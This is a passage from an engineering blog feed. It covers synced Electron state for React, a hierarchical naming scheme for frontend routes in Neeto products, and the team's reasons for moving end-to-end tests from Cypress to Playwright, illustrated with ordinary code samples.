defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  onChange = newValue =&gt; {    if (JSON.stringify(newValue) === JSON.stringify(this.snapshot)) return;    this.snapshot = newValue ?? this.defaultValue;    this.listeners.forEach(listener =&gt; listener());  };  subscribe = callback =&gt; {    this.listeners.add(callback);    if (this.listeners.size === 1) {      window.electron.store.subscribe(this.storageKey, this.onChange);    }    return () =&gt; {      this.listeners.delete(callback);      if (this.listeners.size !== 0) return;      window.electron.store.unsubscribe(this.storageKey);    };  };}</code></pre><p>We made the change so that only one request is sent to <code>main</code>; the rest of thesubscriptions are stored internally and respond to it when the first one isnotified.</p><p>We also added additional checks to ensure that rerender is not triggered ifthere are no changes to the data.</p><h3>Usage</h3><p>Now, whenever a synchronized store for a field is needed, we just need to createan instance of this class and pass it to <code>useSyncExternalStore</code>.</p><pre><code class="language-js">import { useSyncExternalStore } from &quot;react&quot;;const createSyncedStore = ({ defaultValue, storageKey }) =&gt; {  const store = new SyncedStore(defaultValue, storageKey);  return () =&gt; useSyncExternalStore(store.subscribe, store.getSnapshot);};const useUser = createSyncedStore({  storageKey: &quot;user&quot;,  defaultValue: { firstName: &quot;Oliver&quot;, lastName: &quot;Smith&quot; },});const App = () =&gt; {  const user = useUser();  return &lt;div&gt;Name: {`${user.firstName} ${user.lastName}`}&lt;/div&gt;;};</code></pre><p>Now, if we update the <code>user</code> field from anywhere, let it be from any <code>renderer</code>process or <code>main</code>.</p><pre><code class="language-js">window.electron.store.set(&quot;user&quot;, { firstName: &quot;John&quot;, lastName: &quot;Smith&quot; });</code></pre><p>The 
above <code>App</code> component will be rerendered with the latest user data.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Standardizing frontend routes and dynamic URL generation in Neeto products]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/standardizing-frontend-routes"/>
      <updated>2024-09-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/standardizing-frontend-routes</id>
      <content type="html"><![CDATA[<p>We often benefit from the ability to easily identify which component is renderedby simply examining the application UI. By consistently defining routes andmapping them to components, we can easily locate the rendered component bysearching for the corresponding route. This practice also helps us understandthe component's behavior, including when it is rendered and the events leadingup to it.</p><p>This blog post explores a standardized approach to defining frontend routes. Thegoal is to enhance the searchability of components based on the URL structure.<a href="https://www.neeto.com/">Neeto</a> has adopted a structured and hierarchicalapproach to defining frontend routes, prioritizing navigational clarity andensuring consistency and scalability throughout its application ecosystem. Let'shave a closer look at this structure.</p><h3>Structuring the routes</h3><p>The philosophy behind route structure is to create a clear, hierarchical, andorganized way of defining routes for a web application. Let's understand how, atNeeto, we follow this philosophy with an example. Given below is the routedefinition of a meeting scheduling application like<a href="https://www.neeto.com/neetocal">NeetoCal</a>.</p><pre><code class="language-jsx">const routes = {  login: &quot;/login&quot;,  admin: {    meetingLinks: {      index: &quot;/admin/meeting-links&quot;,      show: &quot;/admin/meeting-links/:id&quot;,      design: &quot;/admin/meeting-links/:id/design&quot;,      new: {        index: &quot;/admin/meeting-links/new&quot;,        what: &quot;/admin/meeting-links/new/what&quot;,        type: &quot;/admin/meeting-links/new/type&quot;,      },    },  },};</code></pre><p>The routes here are organized hierarchically to reflect the logical structure ofthe application. Each nested level represents a deeper level of specificity orfunctionality. 
For instance, under the <code>admin</code> route, there are further nested routes for <code>meetingLinks</code>, and within <code>meetingLinks</code>, there are routes for specific actions like <code>index</code> and <code>show</code>. This indicates that the admin panel of the application includes provisions for listing meeting links and showing details of individual meeting links.</p><p>These routes also follow RESTful principles, whenever possible, by using descriptive and meaningful path names. The paths indicate the resource being accessed and the action being performed. For example:</p><ul><li><code>index</code> routes like <code>/admin/meeting-links</code> are for listing resources.</li><li><code>show</code> routes like <code>/admin/meeting-links/:id</code> are for viewing a specific resource.</li><li>Action-specific routes like <code>/admin/meeting-links/:id/design</code> are for performing actions on a specific resource.</li></ul><p>By defining routes in a nested object structure, it becomes clear how routes are related. This improves readability and maintainability. The nested structure allows for easy scalability as well. New routes can be added in a logical place within the hierarchy without disrupting the existing structure. For example, if a new action needs to be added to meeting-links, it can be easily included under the appropriate <code>new</code> subroute.</p><p>String interpolation should be strictly avoided in the path values. Otherwise it can lead to inconsistencies in route definitions and make searching difficult.</p><p>At Neeto, we have an ESLint rule <code>routes-should-match-object-path</code> in <code>@bigbinary/eslint-plugin-neeto</code> which ensures that the path value matches the key. Let's take a few examples to discuss this ESLint rule.</p><p>In the above case we have the key <code>routes.admin.meetingLinks.index</code>. The path for that key is <code>/admin/meeting-links</code>.
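The core of such a key-vs-path check can be sketched in a few lines (a simplification for illustration, not the actual implementation from `@bigbinary/eslint-plugin-neeto`):

```javascript
// Checks that a camelCase route key matches a kebab-case or snake_case
// path segment, e.g. meetingLinks <-> meeting-links / meeting_links.
const camelize = (segment) =>
  segment.toLowerCase().replace(/[-_](\w)/g, (_, ch) => ch.toUpperCase());

const keyMatchesSegment = (key, segment) => camelize(segment) === key;

console.log(keyMatchesSegment("meetingLinks", "meeting-links")); // true
console.log(keyMatchesSegment("meetingLinks", "meeting_links")); // true
console.log(keyMatchesSegment("meetingLinks", "meetinglinks")); // false
```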
What if we change the path value from <code>/admin/meeting-links</code> to <code>/admin/meeting-urls</code>? If we do that, ESLint will throw an error because the key will no longer match the path.</p><p>Since the key has the value <code>meetingLinks</code>, the path can be either <code>meeting-links</code> or <code>meeting_links</code>. But the path can't be <code>meetinglinks</code>, because the key derived from it would be <code>meetinglinks</code> rather than the camelCased <code>meetingLinks</code>, and ESLint would throw an error.</p><p>Similarly, if we have the key <code>routes.admin.meetingLinks.video</code>, then the path must be <code>/admin/meeting-links/video</code>.</p><h3>Usage of index key</h3><p>Imagine we're enhancing our application by introducing a feature that lists all available time slots for scheduling meetings with a person. This scenario requires an <code>index</code> action. However, if listing is the sole action within the <code>availabilities</code> context, there's no need to explicitly use the <code>index</code> key. Instead, we can directly use <code>availabilities</code> as the key for the path.</p><pre><code class="language-jsx">const routes = {
  // rest of the routes
  admin: {
    availabilities: &quot;/admin/availabilities&quot;,
    // rest of the routes
  },
};</code></pre><p>However, if we plan to support multiple actions under the <code>availabilities</code> scope, we will need to use the <code>index</code> key to differentiate between actions.</p><pre><code class="language-jsx">const routes = {
  // rest of the routes
  admin: {
    availabilities: {
      index: &quot;/admin/availabilities&quot;,
      show: &quot;/admin/availabilities/:id&quot;,
    },
    // rest of the routes
  },
};</code></pre><h3>Improving searchability</h3><p>The structured route definitions can significantly enhance the ease of searching for specific route keys.
Let's see how this works in practice.</p><p>Assume you are on the <code>/admin/meeting-links</code> page of the application, as indicated by the address bar in the browser. To determine the component associated with this route, follow these steps:</p><ul><li><p>Generate the key by replacing all forward slashes with periods and converting the path to camelCase. We adhere to camelCase for all path keys to ensure consistency. Thus, <code>/admin/meeting-links</code> becomes <code>admin.meetingLinks</code>.</p></li><li><p>By examining the page associated with <code>/admin/meeting-links</code>, we can determine if multiple actions exist under the <code>meeting-links</code> scope. If multiple actions exist, append <code>.index</code> to the key. If listing is the only action, <code>admin.meetingLinks</code> will suffice. Let's say there are multiple actions, like showing details or editing, under the <code>meeting-links</code> scope. Then we should use <code>admin.meetingLinks.index</code> as the key for searching.</p></li><li><p>Use this formatted key to search in your preferred code editor. This search should help you locate the relevant route definitions and associated components.</p></li></ul><h3>Avoid nesting for dynamic routes</h3><p>When dealing with dynamic elements like <code>:id</code> in route paths, avoiding nesting can enhance searchability and maintain consistency across different parts of the application.</p><p>Consider a scenario where we need to manage various aspects of meeting links in an admin panel. Each meeting link has a unique identifier <code>:id</code>, and we want to create routes for actions like viewing details, designing, and managing members of these meeting links.
Initially, we might be tempted to nest these actions under <code>id</code> as shown below:</p><pre><code class="language-jsx">const routes = {
  // rest of the routes
  admin: {
    // rest of the routes
    meetingLinks: {
      index: &quot;/admin/meeting-links&quot;,
      id: {
        show: &quot;/admin/meeting-links/:id&quot;,
        design: &quot;/admin/meeting-links/:id/design&quot;,
        members: &quot;/admin/meeting-links/:id/members&quot;,
      },
    },
    // rest of the routes
  },
};</code></pre><p>This structure appears logical but has a critical flaw. The goal of structured routing is to enhance searchability. In this scenario, if a developer sees a path like <code>/admin/meeting-links/9482af15-9443-42d1-9b3d-61daeadf6982/design</code> in the browser's address bar, they might search for <code>routes.admin.meetingLinks.meetingId.design</code> or <code>routes.admin.meetingLinks.mId.design</code> to find the associated component. However, neither of these searches would yield relevant results, because the actual key is <code>routes.admin.meetingLinks.id.design</code>. This confusion arises because we left room for assumptions about the key used for the dynamic part of the route.</p><p>By avoiding the use of dynamic elements in the nested object path, we can prevent this issue.
Here's how the corrected nesting should look:</p><pre><code class="language-jsx">const routes = {
  // rest of the routes
  admin: {
    // rest of the routes
    meetingLinks: {
      index: &quot;/admin/meeting-links&quot;,
      show: &quot;/admin/meeting-links/:id&quot;,
      design: &quot;/admin/meeting-links/:id/design&quot;,
      members: &quot;/admin/meeting-links/:id/members&quot;,
    },
    // rest of the routes
  },
};</code></pre><p>This approach ensures that the routes are structured logically and predictably. Now the developer won't face any confusion, since the key <code>routes.admin.meetingLinks.design</code> does not have any dynamic elements in it.</p><h3>File structure</h3><p>To maintain consistency and organization, route definitions should be placed in a centralized file, <code>src/routes.js</code>. The routes should be defined as a constant and exported as the default export, as given below:</p><pre><code class="language-jsx">const routes = {
  login: &quot;/login&quot;,
  admin: {
    availabilities: {
      index: &quot;/admin/availabilities&quot;,
      show: &quot;/admin/availabilities/:id&quot;,
    },
    meetingLinks: {
      index: &quot;/admin/meeting-links&quot;,
      show: &quot;/admin/meeting-links/:id&quot;,
      design: &quot;/admin/meeting-links/:id/design&quot;,
      new: {
        index: &quot;/admin/meeting-links/new&quot;,
        what: &quot;/admin/meeting-links/new/what&quot;,
        type: &quot;/admin/meeting-links/new/type&quot;,
      },
    },
  },
};

export default routes;</code></pre><p>This approach allows for easy importing and ensures that IntelliSense can auto-complete the fields, enhancing developer productivity.</p><h3>Using the route keys in the application</h3><p>How the route keys are used within the application is just as important for searchability as how the routes are defined.
Let's take a look at some of the concepts to consider while using route keys in the application.</p><p>Firstly, do not destructure keys in the route object when you utilize them in various parts of the application, like below:</p><pre><code class="language-jsx">// Avoid this
const {
  admin: {
    meetingLinks: { index },
  },
} = routes;

history.push(index);</code></pre><p>It can hamper searchability. Maintain the complete route path as a single key to ensure clarity and ease of searching.</p><p>Secondly, during in-page navigation, we must use the route keys instead of hardcoded strings. This practice not only enhances searchability but also minimizes the risk of errors due to typos or incorrect paths.</p><pre><code class="language-jsx">// Navigate to the meeting links index page
history.push(routes.admin.meetingLinks.index);</code></pre><p>When dealing with dynamic parameters in URLs, we can make use of the <code>buildUrl</code> function from <code>@bigbinary/neeto-commons-frontend</code>. <code>@bigbinary/neeto-commons-frontend</code> is a library that packages common boilerplate frontend code necessary for all Neeto products. The <code>buildUrl</code> function builds a URL by inflating a route-like template string, say <code>/admin/meeting-links/:id/design</code>, using the provided parameters. It allows you to create URLs dynamically based on a template and replace placeholders with actual values.
Any additional properties in the parameters will be transformed to snake case and attached as query parameters to the URL.</p><pre><code class="language-jsx">buildUrl(routes.admin.meetingLinks.design, { id: &quot;123&quot; });
// output: `/admin/meeting-links/123/design`

buildUrl(routes.admin.meetingLinks.design, { id: &quot;123&quot;, search: &quot;abc&quot; });
// output: `/admin/meeting-links/123/design?search=abc`</code></pre><p>The <code>@bigbinary/eslint-plugin-neeto</code> package used within the Neeto ecosystem features a rule called <code>use-common-routes</code> that disallows the usage of strings and template literals in the <code>path</code> prop of the <code>Route</code> component and in the <code>to</code> prop of the <code>Link</code>, <code>NavLink</code>, and <code>Redirect</code> components. It also prevents the usage of strings and template literals in the <code>history.push()</code> and <code>history.replace()</code> methods.</p><h3>Edge cases to consider</h3><p>Even with a structured approach, you may encounter scenarios where adhering to the guidelines is challenging. Let's explore some of these scenarios and how to retain at least partial searchability in such cases.</p><h4>Routes starting with a dynamic element</h4><p>We have discussed omitting intermediate dynamic elements in paths. However, when there are actions with paths beginning with a dynamic element, we can group them under a meaningful name. While this might hinder searchability, it allows the code editor to partially match the routes.
Consider the below case:</p><pre><code class="language-jsx">const routes = {
  login: &quot;/login&quot;,
  calendar: {
    show: &quot;/:slug&quot;,
    preBook: {
      index: &quot;/:slug/pre-book&quot;,
    },
    cancellationPolicy: &quot;/:slug/cancellation-policy&quot;,
    troubleshoot: &quot;/:slug/troubleshoot&quot;,
  },
  admin: {
    // Rest of the routes
  },
};

export default routes;</code></pre><p>Here, <code>calendar</code> is the name chosen to group all actions whose paths start with the dynamic element <code>:slug</code>.</p><h4>Routes ending with consecutive dynamic elements</h4><p>Consider the path <code>/bookings/:bookingId/:view</code>. Using <code>routes.bookings.show</code> can cause confusion and omit important information about the dynamic element <code>:view</code>. In such cases, we can use a meaningful name to group the last dynamic element. Here is how the object would look:</p><pre><code class="language-jsx">const routes = {
  // Rest of the routes
  bookings: {
    views: {
      show: &quot;/bookings/:bookingId/:view&quot;,
    },
  },
  admin: {
    // Rest of the routes
  },
};

export default routes;</code></pre><p>Here, the key <code>routes.bookings.views.show</code> is used. By allowing any meaningful name in place of <code>views</code>, we maintain partial searchability.</p><h4>Routes with intermediate consecutive dynamic elements</h4><p>When paths contain consecutive dynamic elements, such as <code>/bookings/:bookingId/:view/time</code>, we can omit the dynamic elements directly. Here is how the route would look:</p><pre><code class="language-jsx">const routes = {
  // Rest of the routes
  bookings: {
    time: &quot;/bookings/:bookingId/:view/time&quot;,
  },
  admin: {
    // Rest of the routes
  },
};

export default routes;</code></pre><p>With that, we come to the end of the discussion on structuring frontend routes. Standardizing frontend routes and dynamic URL generation improves searchability, maintainability, and scalability.
By following a structured, hierarchical approach and utilizing tools like the <code>buildUrl</code> function, developers can efficiently manage and navigate the application's routing system.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why we switched from Cypress to Playwright]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/why-we-switched-from-cypress-to-playwright"/>
      <updated>2024-09-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/why-we-switched-from-cypress-to-playwright</id>
      <content type="html"><![CDATA[<p>Until early 2024, <a href="https://cypress.io">Cypress</a> used to be the most downloaded end-to-end (e2e) testing framework in JavaScript. Since then, it has seen a steep decline in popularity and <a href="https://playwright.dev">Playwright</a> has overtaken it as the most downloaded end-to-end testing framework.</p><p>We at BigBinary also switched from Cypress to Playwright in late 2023. In this article, we will see some critical reasons for this change in trends and our personal views on why we think Playwright is the superior JavaScript testing framework.</p><p>&lt;div style=&quot;width:100%;max-width:600px;margin:auto;display:grid;grid-template-columns:auto auto;gap:2rem;align-items:end;&quot;&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;1000&quot; height=&quot;600&quot; alt=&quot;Cypress weekly downloads early 2024&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-weekly-downloads-early-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Cypress weekly downloads - Early 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;1000&quot; height=&quot;600&quot; alt=&quot;Playwright weekly downloads early 2024&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-weekly-downloads-early-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Playwright weekly downloads - Early 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;1000&quot; height=&quot;600&quot; alt=&quot;Cypress weekly downloads September 2024&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-weekly-downloads-september-2024.png&quot;/&gt;&lt;figcaption 
style=&quot;font-size:x-small;&quot;&gt;Cypress weekly downloads - September 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;1200&quot; height=&quot;800&quot; alt=&quot;Playwright weekly downloads September 2024&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-weekly-downloads-september-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Playwright weekly downloads - September 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;/div&gt;</p><h2>Why we chose Cypress initially</h2><p>At BigBinary, we are building a number of products at <a href="https://www.neeto.com">Neeto</a>. When the number of products in our product suite grew and the complexity of each one increased, we needed an automated end-to-end testing solution to ensure our applications were stable, since manual testing was no longer viable.</p><p>When the discussion about choosing the e2e testing framework began in mid-2020, a few names emerged, including top players like Selenium and Cypress, and new players like Playwright. We chose Cypress owing to its popularity and simplicity.</p><p>We were satisfied with its overall performance and easy learning curve. We chose Cypress as our primary e2e testing framework and wrote extensive e2e tests for the entire application suite. While things were smooth sailing initially, we soon encountered many issues with Cypress.</p><h2>Why we decided to switch to Playwright</h2><p>In late August 2023, Cypress released version 13, a major upgrade to the framework that brought along many new features. As Cypress users, we were overjoyed. But the excitement quickly turned to frustration when we realized that, along with the latest features, Cypress had introduced a few changes that were not so open-source in nature.</p><p>It's a known fact that <a href="https://www.cypress.io/cloud">Cypress Cloud</a> is a very expensive platform.
A few third-party providers like <a href="https://currents.dev">Currents.dev</a> and <a href="https://testomat.io/">Testomat</a> provided similar services at much more affordable costs. However, Cypress version 13 blocked all third-party reporters. The main reason offered by the Cypress team was that Cypress Cloud was their primary source of income and that they had to block the third-party tools to survive in the market. Following public backlash, they later revised this explanation with other arguments on how these third-party reporters had misused the Cypress name for personal gain.</p><p>We had switched to Currents.dev ourselves a few months prior to the event and were affected by this change. At that point, we had two options: switch to Cypress Cloud and incur the additional cost, or stay with Currents.dev but get locked into an older version of Cypress permanently.</p><p>Both of these choices were unacceptable to us. This was the final nudge we needed to switch to a new framework. We were already dissatisfied with many issues with Cypress, so we took advantage of the opportunity to research the best e2e testing framework available and switch to that. We compared all the popular frameworks available and observed how they solved our pain points with Cypress. That is when we fell in love with Playwright.</p><p>In our comparison, Playwright was the fastest framework in terms of raw performance and had the highest adoption rate compared to all the other frameworks. It is an open-source framework maintained by Microsoft. Its architecture would enable us to automate more scenarios that were deemed unautomatable using Cypress. We were thrilled to learn that Playwright would fix most of the issues we faced with Cypress.</p><h3>Features locked behind a paywall and control over third-party software</h3><p>While Cypress supports parallelism and orchestration, these features are locked behind a paywall with a subscription to Cypress Cloud.
This means these features, which can easily be implemented with the base Cypress package, are only accessible through an external service.</p><p>While Cypress provides APIs for reporters and orchestration, it deliberately blocks popular third-party tools and services. That's not a good open-source practice. The combination of both makes Cypress an incomplete tool without subscribing to the expensive Cypress Cloud plans, even though the tool is considered free and open-source.</p><p>At the same time, Playwright is an entirely open framework in which anyone can create and publish third-party reporters. It comes with built-in features such as parallelization, sharding, and orchestration, without needing third-party tools and services. The Playwright team goes a step further by showcasing popular third-party reporters in their official documentation.</p><h3>Performance</h3><p>Cypress is the slowest of the e2e testing frameworks available in JS. Here is the list of the most popular frameworks in decreasing order of performance.</p><p>&lt;div style=&quot;width:100%;display:flex;justify-content:center;&quot;&gt;&lt;img alt=&quot;Speed comparison of popular JS testing frameworks&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/speed-comparison-of-testing-frameworks.png&quot;/&gt;&lt;/div&gt;</p><p>&lt;br /&gt;</p><p>Let's compare the performance when the same scenario is implemented in Cypress and Playwright. The scenario is to visit the <a href="https://neeto.com">Neeto homepage</a> and verify the page title.</p><pre><code class="language-js">// Cypress
cy.visit(&quot;https://neeto.com&quot;);
cy.title().should(&quot;eq&quot;, &quot;Neeto: Get things done&quot;);</code></pre><pre><code class="language-ts">// Playwright
await page.goto(&quot;https://neeto.com&quot;);
expect(await page.title()).toBe(&quot;Neeto: Get things done&quot;);</code></pre><p>The results speak for themselves.
While Cypress took <strong>16.09 seconds</strong> to finish the execution, Playwright took only <strong>1.82 seconds</strong>. This is an improvement of <strong>88.68%</strong>! Here, the execution time combines the time taken for setup and the time to complete the test. This is the actual time that matters, because this is the time an engineer has to wait until they see the final test result.</p><p>&lt;div&gt;&lt;br /&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img alt=&quot;Cypress execution time&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-execution-time.png&quot;/&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;Cypress execution&lt;/figcaption&gt;&lt;/figure&gt;&lt;br /&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img alt=&quot;Playwright execution time&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-execution-time.png&quot;/&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;Playwright execution&lt;/figcaption&gt;&lt;/figure&gt;&lt;br /&gt;&lt;/div&gt;</p><p>This shows how much of a performance gain switching to Playwright gave us. Looking at a more practical example, our authentication flow in Cypress and Playwright gives a much better idea of the time saved. The authentication flow, which consistently took around <strong>2 minutes</strong> in Cypress, is completed in under <strong>20 seconds</strong> using Playwright.</p><p>Playwright's out-of-the-box support for parallelism and sharding can have a multiplicative effect on time savings.
If we use process-based parallelism of 4 and shard the tests across 4 machines, then 16 tests run concurrently, which reduces the execution time dramatically.</p><p>Implementing these additional configurations reduced the total test duration for one of our products from <strong>2 hours and 27 minutes</strong> to just <strong>16 minutes</strong>. This is an <strong>89.12%</strong> time saving, directly translating to CI cost savings.</p><h3>Memory issues</h3><p>Cypress follows a split architecture. This means that Cypress executes the tests with a NodeJS process, which orchestrates the tests in the browser where they are executed. This also means that the browser execution environment limits the memory available for tests. Due to this, we have faced crashes in between tests multiple times. At one point, the crashes became so frequent that we had to invest a lot of time and energy into finding a solution, because no test executions were running to completion. We have written a detailed blog on this topic, which can be found <a href="https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers">here</a>.</p><p>Playwright fixes these issues because it handles the test execution in a NodeJS service and communicates with the browsers using <a href="https://chromedevtools.github.io/devtools-protocol/">CDP sessions</a>. This means that the memory management can be done in the NodeJS application, while the browser only has to worry about handling the actual web application we're testing.</p><h3>Architecture prone to flakiness</h3><p>Many of Cypress's features are closely tied to its architecture.
For example, one of the popular features in Cypress is its <a href="https://docs.cypress.io/guides/core-concepts/retry-ability">retry mechanism</a> and <a href="https://docs.cypress.io/guides/core-concepts/introduction-to-cypress#Chains-of-Commands">chaining</a>. However, these features do not always go hand-in-hand.</p><p>Let's consider this snippet of Cypress code.</p><pre><code class="language-js">cy.get(&quot;.inactive-field&quot;).click().type(&quot;Oliver Smith&quot;);</code></pre><p>While this code looks syntactically correct, it will make the test flaky. This is because, in Cypress, only queries are retried, not commands. In the example above, consider that the class name of the field is updated to <code>active-field</code> when we click on it. This means that the <code>cy.get</code> query locates the field and the <code>click</code> command works fine, but the chain fails at the <code>type</code> command. This is because an element with the class name <code>.inactive-field</code> no longer exists in the DOM tree.</p><p>With the Cypress retry mechanisms, one would think that the whole chain would be retried from fetching the element. However, the chain was completed successfully until the <code>click</code> action. So only the <code>type</code> action will be retried, which will cause the whole chain to fail. To avoid this issue, we must rewrite the test after splitting the chain.</p><pre><code class="language-js">cy.get(&quot;.inactive-field&quot;).click();
cy.get(&quot;.inactive-field&quot;).type(&quot;Oliver Smith&quot;);</code></pre><p>While this works without issues, the syntactic sugar that Cypress provides by chaining the commands is no longer usable. Now, let's observe the Playwright code for the same.</p><pre><code class="language-ts">await page.locator(&quot;.inactive-field&quot;).click();
await page.locator(&quot;.inactive-field&quot;).type(&quot;Oliver Smith&quot;);</code></pre><p>It looks pretty similar.
This is because Playwright is designed to reduce flakiness as much as possible. To achieve that goal, it prevents the user from implementing anti-patterns that can lead to flaky results.</p><h3>Misleading simplicity</h3><p>Cypress is well known for its simplicity and natural syntax, which even the most non-technical person can learn. The code samples in the official documentation (which is still some of the best documentation for any framework) make it seem like a walk in the park. But you soon realize that the examples are for very straightforward application scenarios that we seldom encounter when working on large projects. When you start automating complex scenarios, things soon get complicated.</p><p>While performing simple tasks such as clicking on a button or asserting a text is extremely simple, doing something moderately complex, such as storing the text contents of a button in a variable, becomes highly complex. This is because the Cypress architecture works by enqueuing the asynchronous commands. This means that there are no return values for the commands, and the only way to retrieve values from Cypress commands is through a combination of closures and aliases.
Let's consider a scenario where we have to verify that the sum of the randomly generated numbers on the screen is the same as the value shown on the page.</p><p>&lt;div&gt;&lt;br/&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;666&quot; alt=&quot;Sample scenarios of the sum application&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/sample-application-that-adds-two-numbers.png&quot;&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;A sample application that adds two random numbers&lt;/figcaption&gt;&lt;/figure&gt;&lt;br/&gt;&lt;/div&gt;</p><p>Let's see the difference in code when automating this scenario in Cypress and Playwright.</p><pre><code class="language-js">// Cypress
// Considering all elements have proper data-cy labels
cy.get('[data-cy=&quot;generate-new-numbers-button&quot;]').click();

cy.get('[data-cy=&quot;first-number&quot;]').as(&quot;firstNumber&quot;);
cy.get('[data-cy=&quot;second-number&quot;]').as(&quot;secondNumber&quot;);
cy.get('[data-cy=&quot;sum&quot;]').as(&quot;sum&quot;);

cy.get(&quot;@firstNumber&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;num1&quot;);
cy.get(&quot;@secondNumber&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;num2&quot;);
cy.get(&quot;@sum&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;displayedSum&quot;);

// Use the aliases to perform the assertion
cy.get(&quot;@num1&quot;).then(num1 =&gt; {
  cy.get(&quot;@num2&quot;).then(num2 =&gt; {
    cy.get(&quot;@displayedSum&quot;).then(displayedSum =&gt; {
      const expectedSum = num1 + num2;
      expect(displayedSum).to.equal(expectedSum);
    });
  });
});</code></pre><p>We can see how complicated the code becomes when the scenario is just slightly complex.
Meanwhile, the Playwright code will look like this.</p><pre><code class="language-ts">// Playwright
// Considering all elements have proper data-cy labels
// and the default test-id-attribute is data-cy
await page.getByTestId(&quot;generate-new-numbers-button&quot;).click();

const firstNumber = await page.getByTestId(&quot;first-number&quot;).innerText();
const secondNumber = await page.getByTestId(&quot;second-number&quot;).innerText();
const sum = await page.getByTestId(&quot;sum&quot;).innerText();

expect(parseInt(firstNumber) + parseInt(secondNumber)).toBe(parseInt(sum));</code></pre><p>We can see from the code above how easily we can implement the same logic in Playwright.</p><h3>Cost of maintenance for Cypress vs. Playwright tests</h3><p>Cypress is an easy-to-learn framework. This simplicity is due to the abstraction of the most commonly used functionalities into Cypress commands. However, this is a double-edged sword. The abstraction of logic into commands means that customization is complicated in Cypress.</p><p>One of Cypress's significant drawbacks is its reliance on HTML tags and attributes to locate an element. While this makes sense from a programming standpoint, the end user is concerned about the roles of the page elements (button, heading, etc.) and not how they have been implemented. For the same reason, the text, appearance, and functionality of the application are bound to remain consistent throughout the various iterations, while the attributes themselves are prone to change.</p><p>This ultimately means the developers must keep fixing and rewriting the Cypress tests for minor UI updates. Cypress is also the slowest of all the e2e testing frameworks in JavaScript, resulting in longer CI runtimes and higher costs.
These combined factors make the cost of maintaining Cypress tests exceptionally high.</p><p>Besides this, Cypress has many features locked behind its Cypress Cloud platform, which is very <a href="https://www.cypress.io/pricing">expensive</a>, considering that all it does is collect the test results. This is an additional cost to bear on top of the already expensive maintenance of the Cypress tests. Given these factors, the cost of maintaining Cypress tests can quickly outweigh the benefits of its simplicity and ease of use.</p><p>Playwright solves all of these issues. It has many built-in reporters and an excellent API for creating custom reporters, so many third-party reporters are available. We can even build our own custom reporter to save even more costs.</p><h3>Browser support and support for mobile viewport</h3><p>Since Cypress tests run directly in the browser, only a few browsers are supported. Until recently, it did not even support <a href="https://webkit.org/">WebKit</a> browsers, even though <a href="https://www.apple.com/in/safari/">Safari</a> has a considerable market share. Even at the time of writing this article, Cypress's WebKit support is still in beta. Even if it supports the required browsers, there is still the constraint that only one browser can be used during an execution.</p><p>Playwright fixes all these issues with minimal effort from our end. It has complete support for WebKit browsers and conveniently provides a set of presets for the browsers, user agents, and viewports of the most popular devices on the market, including mobile devices.
Furthermore, Playwright allows us to execute the same test in different browsers concurrently with the help of projects. These configurations give us the confidence that a passing Playwright test means the features will work fine for all users.</p><h3>Support for multiple tabs and browsers</h3><p>While most of the features of a web application can be tested within a single tab, there are a few cases where multiple tabs or browsers become necessary. We encountered one such scenario while writing tests for <a href="https://neeto.com/neetochat">NeetoChat</a>, a real-time chat application. To test NeetoChat, we need to open two screens: one for the sender and the other for the receiver.</p><p>Cypress lacks support for multiple tabs, so the only way to test these scenarios was this long and complicated process:</p><ol><li>Login as the sender</li><li>Send a message</li><li>Logout</li><li>Login as the receiver</li><li>Verify the message</li><li>Send a reply</li><li>Logout</li><li>Login as the sender</li><li>Verify the response</li></ol><p>We can see the tedious steps that we need to perform for a relatively simple scenario. This becomes even more tedious if we configure sessions in Cypress, because we need to invalidate them each time we log out so that we can log in as a different user.</p><p>On the other hand, Playwright provides support for multiple tabs and multiple browsers. This means we can log in as the sender from one tab and the receiver from another, making the scenario more straightforward and effective. Additionally, we could identify whether the messages were being delivered in real time, because there is no delay in the user switching between the message posting and verification processes. Playwright also supports browser contexts, which isolate the events 